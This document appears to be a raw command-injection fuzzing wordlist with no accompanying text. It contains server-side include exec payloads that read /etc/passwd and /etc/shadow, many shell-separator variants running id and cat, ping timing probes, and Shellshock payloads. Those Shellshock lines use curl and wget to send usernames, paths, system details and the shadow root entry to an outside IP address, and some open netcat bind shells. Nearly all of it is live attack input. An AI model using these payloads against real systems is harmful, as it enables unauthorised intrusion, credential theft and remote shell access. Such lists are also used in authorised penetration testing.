<!--#exec%20cmd="/bin/cat%20/etc/passwd"--> <!--#exec%20cmd="/bin/cat%20/etc/shadow"--> <!--#exec%20cmd="/usr/bin/id;--> <!--#exec%20cmd="/usr/bin/id;--> /index.html|id| ;id; ;id ;netstat -a; ;system('cat%20/etc/passwd') ;id; |id |/usr/bin/id |id| |/usr/bin/id| ||/usr/bin/id| |id; ||/usr/bin/id; ;id| ;|/usr/bin/id| \n/bin/ls -al\n \n/usr/bin/id\n \nid\n \n/usr/bin/id; \nid; \n/usr/bin/id| \nid| ;/usr/bin/id\n ;id\n |usr/bin/id\n |nid\n `id` `/usr/bin/id` a);id a;id a);id; a;id; a);id| a;id| a)|id a|id a)|id; a|id |/bin/ls -al a);/usr/bin/id a;/usr/bin/id a);/usr/bin/id; a;/usr/bin/id; a);/usr/bin/id| a;/usr/bin/id| a)|/usr/bin/id a|/usr/bin/id a)|/usr/bin/id; a|/usr/bin/id ;system('cat%20/etc/passwd') ;system('id') ;system('/usr/bin/id') %0Acat%20/etc/passwd %0A/usr/bin/id %0Aid %0A/usr/bin/id%0A %0Aid%0A & ping -i 30 127.0.0.1 & & ping -n 30 127.0.0.1 & %0a ping -i 30 127.0.0.1 %0a `ping 127.0.0.1` | id & id ; id %0a id %0a `id` $;/usr/bin/id () { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=16?user=\`whoami\`" () { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=18?pwd=\`pwd\`" () { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=20?shadow=\`grep root /etc/shadow\`" () { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=22?uname=\`uname -a\`" () { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=24?shell=\`nc -lvvp 1234 -e /bin/bash\`" () { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=26?shell=\`nc -lvvp 1236 -e /bin/bash &\`" () { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=5" () { :;}; /bin/bash -c "sleep 1 && curl http://135.23.158.130/.testing/shellshock.txt?sleep=1&?vuln=6" () { :;}; /bin/bash -c "sleep 1 && echo vulnerable 1" () { :;}; /bin/bash -c "sleep 3 && curl http://135.23.158.130/.testing/shellshock.txt?sleep=3&?vuln=7" () { :;}; /bin/bash -c "sleep 3 && echo vulnerable 3" () { :;}; /bin/bash -c "sleep 6 && curl http://135.23.158.130/.testing/shellshock.txt?sleep=6&?vuln=8" () { :;}; /bin/bash -c "sleep 6 && curl http://135.23.158.130/.testing/shellshock.txt?sleep=9&?vuln=9" () { :;}; /bin/bash -c "sleep 6 && echo vulnerable 6" () { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=17?user=\`whoami\`" () { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=19?pwd=\`pwd\`" () { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=21?shadow=\`grep root /etc/shadow\`" () { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=23?uname=\`uname -a\`" () { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=25?shell=\`nc -lvvp 1235 -e /bin/bash\`" () { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=27?shell=\`nc -lvvp 1237 -e /bin/bash &\`" () { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=4" cat /etc/hosts $(`cat /etc/passwd`) cat /etc/passwd %0Acat%20/etc/passwd {{ get_user_file("/etc/passwd") }} system('cat /etc/passwd');